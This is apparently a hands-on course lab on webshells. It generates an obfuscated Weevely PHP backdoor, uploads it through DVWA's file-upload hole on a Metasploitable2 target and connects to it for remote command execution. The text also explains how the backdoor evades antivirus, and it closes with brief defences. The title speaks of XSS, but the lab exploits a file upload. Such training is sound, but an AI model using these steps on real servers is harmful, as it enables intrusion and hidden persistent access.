Mastering XSS Vulnerabilities: Hands-On Webshell Attacks with Weevely in Kali Linux Exploit Labs

 

1. Course Description: Understanding XSS Vulnerabilities

 

This course serves as a hands-on lab tutorial. To clearly explain certain steps in the experiment, theoretical content will be included, along with carefully selected article recommendations. This approach ensures you strengthen your theoretical foundation while actively engaging in practical exercises, particularly in addressing XSS Vulnerabilities.

Note: Due to the high cost of configuring cloud hosts for the experiments, usage will be limited to a maximum of six attempts per experiment.

2. Learning Methodology for XSS Vulnerabilities

 

The Kali series courses on Exploit Lab include five training camps. This specific training camp focuses on methods of web application attacks. The course consists of 20 experiments, each featuring detailed steps and screenshots. It is aimed at students who have some foundational knowledge of Linux systems and wish to quickly gain proficiency in Kali penetration testing.

The key to learning is to engage in extensive practice and to ask questions. After starting an experiment, follow the provided steps while understanding the detailed context behind each action.

If there are recommended reading materials at the start of an experiment, be sure to go through them before proceeding. Theoretical knowledge serves as a necessary base for practical applications.

3. Overview of XSS Vulnerabilities in Sessions

 

In this experiment, we’ll initially explore the concept of Kali Linux and penetration testing. The objectives include completing the following tasks sequentially:

• Introduction to Webshell
• Introduction to Weevely
• Webshell Practical Execution
• Webshell Prevention

4. Recommended Reading on XSS Vulnerabilities

 

For this session, the following reading material is recommended:

1. Usage of Weevely

5. Webshell Attacks

 

5.1 Introduction to Webshell

 

A Webshell is a command execution environment in the form of web files such as ASP, PHP, JSP, or CGI, often referred to as a web-based backdoor. After compromising a website, attackers typically mix ASP or PHP backdoor files with legitimate files in the server’s root directory. By using a browser to access the backdoor, attackers can gain a command execution environment to control the server.

As the name implies, “web” signifies the necessity of an active web service, while “shell” indicates a level of operational control over the server. Webshells are often described as tools that allow intruders to manipulate a server via its web port. Most Webshells take the form of dynamic scripts, which is why they are sometimes called web-based backdoor tools (source: Baidu Encyclopedia).

The primary purpose of a Webshell is to establish a connection between a victim machine and an attacker machine through web loading, enabling the execution of shell commands on the victim machine.

5.2 Introduction to Weevely

 

In previous experiments dealing with local and remote file inclusions, we briefly mentioned Webshells without delving deeply into their details. Webshells are essentially dynamic scripts used to establish a connection between the victim and the attacker machine. Such scripts often require the support of foundational attack methods, like XSS or file inclusion, to function effectively.

Implementing a Webshell is relatively simple; for example, a basic Webshell in PHP can use the system() function to accept commands as parameters, execute them, and return the results. Similar functions include exec(), shell_exec(), and proc_open(). Basic Webshells can execute simple commands but lack interactivity, which led to the development of more advanced methods like using Netcat for remote shell connections.

In this particular experiment, we will be using a new tool: Weevely, to perform the attack.

Weevely is a well-known PHP-based backdoor creation tool, also known as “PHP HackBar.” Written in Python, it is a WebShell tool that combines WebShell generation and connection capabilities. Notably, Weevely is designed to work on Linux systems, and certain modules may not function in a Windows environment.

What is Weevely? It is an undetectable PHP WebShell that simulates remote connections. As a vital tool for post-exploitation web application development, it can act as a hidden backdoor or an alternative remote management console. To use Weevely, simply generate and upload the PHP script to the target web server, then run the Weevely client locally to execute shell commands (source: Baidu Encyclopedia).

5.3 Webshell Environment

 

Every attack starts with an established environment, and the first step in the lab is to set up the experimental environment. On the lab desktop, double-click the Xfce terminal to open it:

Let’s start by booting the Kali virtual machine. To launch the Kali virtual machine program, input the following commands in the terminal:

  
# Start the Kali virtual machine
sudo virsh start Kali

# Note: The "K" in Kali is uppercase
ssh root@Kali  

Note: After Kali launches, wait for a while before connecting. Otherwise, you may encounter the error shown in the image.

Once the Kali VM has fully started, re-enter the following command:

You should now successfully log into the Kali terminal interface.

Our attack target will use the Metasploitable2 environment.

On the lab desktop, double-click the Xfce terminal to open it:

Use sudo virsh start Metasploitable2 to launch the target system virtual machine:

Wait for a moment, and once the virtual machine has fully booted, open Firefox on the desktop:

Access the target machine’s system using the IP address 192.168.122.102:

Once the target machine is running normally, visiting its IP address will display a page like this.

Click on DVMA to access the DVMA login page. The default username and password are `admin` and `password`. After logging in, you will see a screen like this:

To perform a simple attack, we set the security level to the lowest. First, navigate to the security settings page:

Then set the security level to “low”:

If the bottom of the screen shows the updated security level, the change was successful:

5.4 Webshell in Action

 

After completing all the setup steps, we can begin the attack.

The main attack process includes:

• Generating a webshell with Weevely
• Exploiting an upload vulnerability to upload the webshell
• Establishing a connection, remote control, and validating the webshell

Therefore, the first step is generating a webshell using Weevely.

Execute the weevely command in Kali to display:

This shows the Weevely version information, along with commonly used parameters and their syntax:

# Connect to a webshell
weevely   [cmd]

# Load an existing connection/session
weevely session  [cmd]

# Generate a webshell
weevely generate  

The first step is generating the webshell file using weevely generate:

weevely generate shiyanlou /var/www/html/webshell.php

The parameters in this command each have the following meanings:

Parameter Name	Parameter Meaning
shiyanlou	The weevely password needed to connect to the backdoor and establish a session. shiyanlou represents the password required during this connection process.
/var/www/html/webshell.php	Specifies the exact location where the backdoor file should be generated on the attacker’s local environment—in this case, it is under the /var/www/html/ folder, the root directory for Apache.

After successfully executing the command, the confirmation prompt for generating the backdoor file looks as follows:

Generated backdoor with password 'shiyanlou' in '/var/www/html/webshell.php' of 1459 byte size.

The prompt provides details about the successful generation of the backdoor file, its password, the file’s location, and the size in bytes.

By running ls -lah /var/www/html, we can confirm the presence of the backdoor file:

The backdoor file webshell.php has indeed been generated successfully.

Using less /var/www/html/webshell.php, we can examine its source code:

The code looks intentionally obfuscated, from variable names to overall formatting, making it difficult to comprehend. This is one of weevely’s key characteristics: stealth. Both its data and control channels are heavily disguised. The generated webshell evades detection by most security tools, including antivirus software.

First, we can observe that variables in the code are given obscure, randomly generated names consisting of mixed upper- and lower-case letters. This helps conceal the code’s purpose.

Additionally, take a closer look at the penultimate line:

$J=str_replace('*X','',$e.$t.$H.$n.$P.$O.$B.$s.$g.$x.$r.$L);

The code is rife with the *X string. During the code generation process, weevely randomly inserts such strings into the source code to create noise and confound antivirus software, preventing it from matching the code to known malicious patterns in its database. These inserted strings also disrupt execution in PHP interpreters, necessitating the use of the str_replace() function to remove all instances of *X, thereby restoring executable functionality.

Each time weevely generates code, it uses different noise strings, such as *X in this instance, which will differ during future generations.

We can exit less using q.

Thus, the first step of creating the webshell attack script is complete. The next step involves finding a way to execute this script on the target server. Techniques for this include exploiting XSS vulnerabilities, file inclusion vulnerabilities, etc.

For this demonstration, we’ll use a straightforward approach: exploiting an upload vulnerability.

Open the DVWA (Damn Vulnerable Web Application) environment provided for this exercise:

Since Kali Linux does not offer a graphical interface for uploads, we cannot upload the webshell.php file directly from Kali to DVWA. Instead, we need to transfer the file to the shiyanlou system and then upload it to DVWA from there.

On the shiyanlou terminal, use scp root@kali:/var/www/html/webshell.php ./ to download the backdoor file from Kali:

Next, navigate to DVWA’s file upload vulnerability feature. Click “browse” and select webshell.php for upload to the target server:

After clicking Upload, ensure the file upload is successful. You’ll be provided with the file’s accessible address along with confirmation of the upload.

Once the backdoor file is planted on the target host, navigate back to Kali’s terminal. Use the following weevely command to establish a session and connect to the backdoor:

weevely http://192.168.122.102/dvwa/hackable/uploads/webshell.php shiyanlou

This command creates a connection to the backdoor, enabling stealth access to the target server.

http://192.168.122.102/dvwa/hackable/uploads/webshell.php indicates the location of the script we uploaded, while shiyanlou is the password we set when creating the file to establish the connection.

After executing the command, we receive the following output:

This interface provides us with an interactive session in Weevely, allowing us to directly run commands like pwd:

From the screenshot, we can see that our local Weevely has successfully established a connection with the webshell we deployed. Furthermore, we’ve gained access to the target host with the www-data user account.

This is akin to logging into the target host with ssh [email protected], allowing us to execute commands based on the permissions of the compromised user:

This process, enabled by the webshell, mimics the functionality of logging into a shell via SSH. Attackers can then execute various commands on the target system.

Note: If you encounter an error while executing Weevely, such as:

You can resolve the issue by running the command rm -rf /root/.weevely to delete the local cache.

5.5 Webshell Defense

Looking at the practical demonstration above, using a webshell involves several key steps:

• First, you need a payload, which can serve as the backdoor or spy you deploy on the remote host. This can be generated via tools like Weevely or by creating a custom one.
• Second, you require an upload vulnerability or any exploit that allows the execution of a malicious script on the remote host.

While preventing attackers from generating payloads may not be feasible, we can focus on ensuring that these payloads cannot be successfully uploaded or executed. Even if a payload is uploaded, establishing a connection with the attacker’s system requires communication via a network port. As such, key defensive strategies against webshell attacks include:

• Improving code logic to minimize vulnerabilities and prevent attackers from uploading malicious payloads to the target host.
• In cases where vulnerabilities exist, using firewalls to block unnecessary network ports, thereby preventing the payload from connecting to the attacker’s machine.

6. Summary

In this lab, we explored the following areas. If you encounter any questions, feel free to engage with us on Shiyanlou Q&A:

• An introduction to webshells
• Practical use of webshells
• Defensive measures against webshell attacks

It is critical that you practice and complete the lab. Merely reading the instructions may seem simple, but the real learning happens when troubleshooting issues during implementation. The process of resolving these problems is where the true value lies.